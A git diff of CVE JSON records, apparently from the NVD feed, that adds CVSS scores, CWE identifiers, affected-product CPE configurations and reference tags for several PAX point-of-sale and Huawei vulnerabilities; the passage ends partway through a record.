100644 --- a/CVE-2023/CVE-2023-406xx/CVE-2023-40687.json +++ b/CVE-2023/CVE-2023-406xx/CVE-2023-40687.json @@ -2,8 +2,8 @@ "id": "CVE-2023-40687", "sourceIdentifier": "psirt@us.ibm.com", "published": "2023-12-04T02:15:07.077", - "lastModified": "2023-12-07T17:34:30.903", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:09.237", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -143,6 +143,10 @@ "Vendor Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0001/", + "source": "psirt@us.ibm.com" + }, { "url": "https://www.ibm.com/support/pages/node/7087149", "source": "psirt@us.ibm.com", diff --git a/CVE-2023/CVE-2023-406xx/CVE-2023-40692.json b/CVE-2023/CVE-2023-406xx/CVE-2023-40692.json index b142e09cad5..228969bb188 100644 --- a/CVE-2023/CVE-2023-406xx/CVE-2023-40692.json +++ b/CVE-2023/CVE-2023-406xx/CVE-2023-40692.json @@ -2,8 +2,8 @@ "id": "CVE-2023-40692", "sourceIdentifier": "psirt@us.ibm.com", "published": "2023-12-04T00:15:07.000", - "lastModified": "2023-12-07T15:29:41.200", - "vulnStatus": "Analyzed", + "lastModified": "2024-01-19T16:15:09.330", + "vulnStatus": "Modified", "descriptions": [ { "lang": "en", @@ -136,6 +136,10 @@ "Vendor Advisory" ] }, + { + "url": "https://security.netapp.com/advisory/ntap-20240119-0001/", + "source": "psirt@us.ibm.com" + }, { "url": "https://www.ibm.com/support/pages/node/7087157", "source": "psirt@us.ibm.com", diff --git a/CVE-2023/CVE-2023-421xx/CVE-2023-42134.json b/CVE-2023/CVE-2023-421xx/CVE-2023-42134.json index 407262fb2bb..c2faa4bad54 100644 --- a/CVE-2023/CVE-2023-421xx/CVE-2023-42134.json +++ b/CVE-2023/CVE-2023-421xx/CVE-2023-42134.json @@ -2,8 +2,8 @@ "id": "CVE-2023-42134", "sourceIdentifier": "cvd@cert.pl", "published": "2024-01-15T14:15:24.190", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:14:39.460", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -16,6 +16,26 @@ ], "metrics": { "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "PHYSICAL", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 6.8, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 0.9, + "impactScore": 5.9 + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -39,6 +59,16 @@ ] }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-Other" + } + ] + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -50,22 +80,93 @@ ] } ], + "configurations": [ + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_v11.1.45_20230314", + "matchCriteriaId": "EEE64397-E23F-4601-A869-7CF855EFB5C2" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*", + "matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_v11.1.45_20230314", + "matchCriteriaId": "EEE64397-E23F-4601-A869-7CF855EFB5C2" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*", + "matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C" + } + ] + } + ] + } + ], "references": [ { "url": "https://blog.stmcyber.com/pax-pos-cves-2023/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://cert.pl/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://ppn.paxengine.com/release/development", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Permissions Required" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-421xx/CVE-2023-42135.json b/CVE-2023/CVE-2023-421xx/CVE-2023-42135.json index 7fe00d39930..8c576cdd3f4 100644 --- a/CVE-2023/CVE-2023-421xx/CVE-2023-42135.json +++ b/CVE-2023/CVE-2023-421xx/CVE-2023-42135.json @@ -2,8 +2,8 @@ "id": "CVE-2023-42135", "sourceIdentifier": "cvd@cert.pl", "published": "2024-01-15T14:15:24.413", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T15:47:29.607", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -16,6 +16,26 @@ ], "metrics": { "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "PHYSICAL", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 6.8, + "baseSeverity": "MEDIUM" + }, + "exploitabilityScore": 0.9, + "impactScore": 5.9 + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -39,6 +59,16 @@ ] }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-74" + } + ] + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -50,22 +80,93 @@ ] } ], + "configurations": [ + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*", + "matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*", + "matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C" + } + ] + } + ] + } + ], "references": [ { "url": "https://blog.stmcyber.com/pax-pos-cves-2023/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://cert.pl/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://ppn.paxengine.com/release/development", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Permissions Required" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-421xx/CVE-2023-42136.json b/CVE-2023/CVE-2023-421xx/CVE-2023-42136.json index 5f832afd4a8..f2896c02d08 100644 --- a/CVE-2023/CVE-2023-421xx/CVE-2023-42136.json +++ b/CVE-2023/CVE-2023-421xx/CVE-2023-42136.json @@ -2,8 +2,8 @@ "id": "CVE-2023-42136", "sourceIdentifier": "cvd@cert.pl", "published": "2024-01-15T14:15:24.670", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:19:25.047", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -16,6 +16,26 @@ ], "metrics": { "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "LOCAL", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 7.8, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 1.8, + "impactScore": 5.9 + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -39,6 +59,16 @@ ] }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-74" + } + ] + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -50,22 +80,261 @@ ] } ], + "configurations": [ + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*", + "matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a6650:-:*:*:*:*:*:*:*", + "matchCriteriaId": "8C020172-6E0C-4265-B4C9-ED93C84FE8AA" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a800:-:*:*:*:*:*:*:*", + "matchCriteriaId": "AFCD5218-5AA0-4086-926C-3EAEE1E43136" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a77:-:*:*:*:*:*:*:*", + "matchCriteriaId": "0390BD9D-1FF7-456E-9394-34F009DE82CF" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*", + "matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*", + "matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920_max:-:*:*:*:*:*:*:*", + "matchCriteriaId": "8612B592-DFE4-4B66-B24D-71EEA747FAA2" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:d190:-:*:*:*:*:*:*:*", + "matchCriteriaId": "DB9483F8-5201-4F31-9F9A-F00A48C4C972" + } + ] + } + ] + } + ], "references": [ { "url": "https://blog.stmcyber.com/pax-pos-cves-2023/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://cert.pl/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://ppn.paxengine.com/release/development", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Permissions Required" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-421xx/CVE-2023-42137.json b/CVE-2023/CVE-2023-421xx/CVE-2023-42137.json index 547a80d2ee5..a5c422c3287 100644 --- a/CVE-2023/CVE-2023-421xx/CVE-2023-42137.json +++ b/CVE-2023/CVE-2023-421xx/CVE-2023-42137.json @@ -2,8 +2,8 @@ "id": "CVE-2023-42137", "sourceIdentifier": "cvd@cert.pl", "published": "2024-01-15T14:15:24.900", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:21:06.650", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -16,6 +16,26 @@ ], "metrics": { "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + "attackVector": "LOCAL", + "attackComplexity": "LOW", + "privilegesRequired": "LOW", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "HIGH", + "availabilityImpact": "HIGH", + "baseScore": 7.8, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 1.8, + "impactScore": 5.9 + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -39,6 +59,16 @@ ] }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-59" + } + ] + }, { "source": "cvd@cert.pl", "type": "Secondary", @@ -50,22 +80,261 @@ ] } ], + "configurations": [ + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a50:-:*:*:*:*:*:*:*", + "matchCriteriaId": "DFCCCD93-0374-4AE1-8986-E0997B53A51C" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a6650:-:*:*:*:*:*:*:*", + "matchCriteriaId": "8C020172-6E0C-4265-B4C9-ED93C84FE8AA" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a800:-:*:*:*:*:*:*:*", + "matchCriteriaId": "AFCD5218-5AA0-4086-926C-3EAEE1E43136" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a77:-:*:*:*:*:*:*:*", + "matchCriteriaId": "0390BD9D-1FF7-456E-9394-34F009DE82CF" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920:-:*:*:*:*:*:*:*", + "matchCriteriaId": "D351F870-D43F-48B4-B2AC-0FDDD7B82ED4" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920_pro:-:*:*:*:*:*:*:*", + "matchCriteriaId": "FF80918D-3453-4F42-A8A0-DA993C398394" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:a920_max:-:*:*:*:*:*:*:*", + "matchCriteriaId": "8612B592-DFE4-4B66-B24D-71EEA747FAA2" + } + ] + } + ] + }, + { + "operator": "AND", + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:paxtechnology:paydroid:*:*:*:*:*:*:*:*", + "versionEndIncluding": "8.1.0_sagittarius_11.1.50_20230614", + "matchCriteriaId": "970DD715-DA0A-4E3B-A51A-4B04EEC55CC8" + } + ] + }, + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": false, + "criteria": "cpe:2.3:h:paxtechnology:d190:-:*:*:*:*:*:*:*", + "matchCriteriaId": "DB9483F8-5201-4F31-9F9A-F00A48C4C972" + } + ] + } + ] + } + ], "references": [ { "url": "https://blog.stmcyber.com/pax-pos-cves-2023/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Exploit", + "Third Party Advisory" + ] }, { "url": "https://cert.pl/en/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://cert.pl/posts/2024/01/CVE-2023-4818/", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Third Party Advisory" + ] }, { "url": "https://ppn.paxengine.com/release/development", - "source": "cvd@cert.pl" + "source": "cvd@cert.pl", + "tags": [ + "Permissions Required" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-439xx/CVE-2023-43985.json b/CVE-2023/CVE-2023-439xx/CVE-2023-43985.json index f0632adbb2f..577871f782f 100644 --- a/CVE-2023/CVE-2023-439xx/CVE-2023-43985.json +++ b/CVE-2023/CVE-2023-439xx/CVE-2023-43985.json @@ -2,8 +2,8 @@ "id": "CVE-2023-43985", "sourceIdentifier": "cve@mitre.org", "published": "2024-01-19T14:15:12.317", - "lastModified": "2024-01-19T14:15:12.317", - "vulnStatus": "Received", + "lastModified": "2024-01-19T15:56:19.500", + "vulnStatus": "Awaiting Analysis", "descriptions": [ { "lang": "en", diff --git a/CVE-2023/CVE-2023-441xx/CVE-2023-44112.json b/CVE-2023/CVE-2023-441xx/CVE-2023-44112.json index 71ea6dabc1b..6a4a13f6d97 100644 --- a/CVE-2023/CVE-2023-441xx/CVE-2023-44112.json +++ b/CVE-2023/CVE-2023-441xx/CVE-2023-44112.json @@ -2,8 +2,8 @@ "id": "CVE-2023-44112", "sourceIdentifier": "psirt@huawei.com", "published": "2024-01-16T08:15:08.467", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:10:25.587", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,8 +14,41 @@ "value": "Vulnerabilidad de acceso fuera de los l\u00edmites en el m\u00f3dulo de autenticaci\u00f3n del dispositivo. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 7.5, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 3.6 + } + ] + }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "CWE-125" + } + ] + }, { "source": "psirt@huawei.com", "type": "Secondary", @@ -27,14 +60,72 @@ ] } ], + "configurations": [ + { + "nodes": [ + { + "operator": "OR", + "negate": false, + "cpeMatch": [ + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:emui:11.0.1:*:*:*:*:*:*:*", + "matchCriteriaId": "511F8CE2-C2B6-4A08-B992-49D9B75B8655" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:emui:12.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "A974CA73-84E8-480B-BB4C-4A81D0C985B2" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:emui:13.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "353AEAF2-AF46-4835-93E1-4F942D5E2810" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:2.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "20112231-B840-44D3-A061-B9B9F80EE378" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:2.1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "C01447F1-7F58-4AE3-B403-C01B2575D898" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "CB3751C1-7729-41D3-AE50-80B5AF601135" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:3.1.0:*:*:*:*:*:*:*", + "matchCriteriaId": "4D81C4EF-7CAF-4E60-91A4-8CF7B95B2B54" + }, + { + "vulnerable": true, + "criteria": "cpe:2.3:o:huawei:harmonyos:4.0.0:*:*:*:*:*:*:*", + "matchCriteriaId": "8198CDB2-4BC5-411A-8736-615A531FC545" + } + ] + } + ] + } + ], "references": [ { "url": "https://consumer.huawei.com/en/support/bulletin/2024/1/", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] }, { "url": "https://device.harmonyos.com/en/docs/security/update/security-bulletins-202401-0000001799925977", - "source": "psirt@huawei.com" + "source": "psirt@huawei.com", + "tags": [ + "Vendor Advisory" + ] } ] } \ No newline at end of file diff --git a/CVE-2023/CVE-2023-441xx/CVE-2023-44117.json b/CVE-2023/CVE-2023-441xx/CVE-2023-44117.json index 101769425f9..758fa248a23 100644 --- a/CVE-2023/CVE-2023-441xx/CVE-2023-44117.json +++ b/CVE-2023/CVE-2023-441xx/CVE-2023-44117.json @@ -2,8 +2,8 @@ "id": "CVE-2023-44117", "sourceIdentifier": "psirt@huawei.com", "published": "2024-01-16T08:15:08.573", - "lastModified": "2024-01-16T13:56:05.467", - "vulnStatus": "Awaiting Analysis", + "lastModified": "2024-01-19T16:11:54.657", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -14,8 +14,41 @@ "value": "Vulnerabilidad de relaciones de confianza siendo inexactas en escenarios distribuidos. La explotaci\u00f3n exitosa de esta vulnerabilidad puede afectar la confidencialidad del servicio." } ], - "metrics": {}, + "metrics": { + "cvssMetricV31": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "cvssData": { + "version": "3.1", + "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "attackVector": "NETWORK", + "attackComplexity": "LOW", + "privilegesRequired": "NONE", + "userInteraction": "NONE", + "scope": "UNCHANGED", + "confidentialityImpact": "HIGH", + "integrityImpact": "NONE", + "availabilityImpact": "NONE", + "baseScore": 7.5, + "baseSeverity": "HIGH" + }, + "exploitabilityScore": 3.9, + "impactScore": 3.6 + } + ] + }, "weaknesses": [ + { + "source": "nvd@nist.gov", + "type": "Primary", + "description": [ + { + "lang": "en", + "value": "NVD-CWE-noinfo" + } + ] + 